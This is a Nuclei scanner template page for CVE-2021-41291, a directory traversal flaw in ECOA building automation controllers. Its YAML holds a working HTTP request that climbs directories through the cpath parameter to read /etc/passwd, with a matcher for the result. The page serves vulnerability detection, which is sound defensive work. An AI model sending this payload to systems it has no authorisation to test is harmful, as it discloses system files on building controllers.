Skip to content
Nuclei Templates

ECOA Building Automation System - Directory Traversal Content Disclosure

ID: CVE-2021-41291

Severity: high

Author: gy741

Tags: cve2021,cve,ecoa,lfi,traversal

Description

Section titled “Description”

The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device

YAML Source

Section titled “YAML Source”
id: CVE-2021-41291


info:
  name: ECOA Building Automation System - Directory Traversal Content Disclosure
  author: gy741
  severity: high
  description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
  impact: |
    An attacker can exploit this vulnerability to access sensitive files and directories, potentially exposing sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in the ECOA Building Automation System.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41291
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
    - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
    - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-41291
    cwe-id: CWE-22
    epss-score: 0.02626
    epss-percentile: 0.90324
    cpe: cpe:2.3:o:ecoa:ecs_router_controller-ecs_firmware:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ecoa
    product: ecs_router_controller-ecs_firmware
  tags: cve2021,cve,ecoa,lfi,traversal


http:
  - raw:
      - |
        GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4a0a0047304502204e06bf49552e65fefb717c04a29c82c53ea45223b97c4d2d3b1bdd66d898ce30022100bf4babe88d865418c9482f6cc2008c0deeadfc813b9b1bf4d270d800afbc2bbb:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-41291.yaml"

View on Github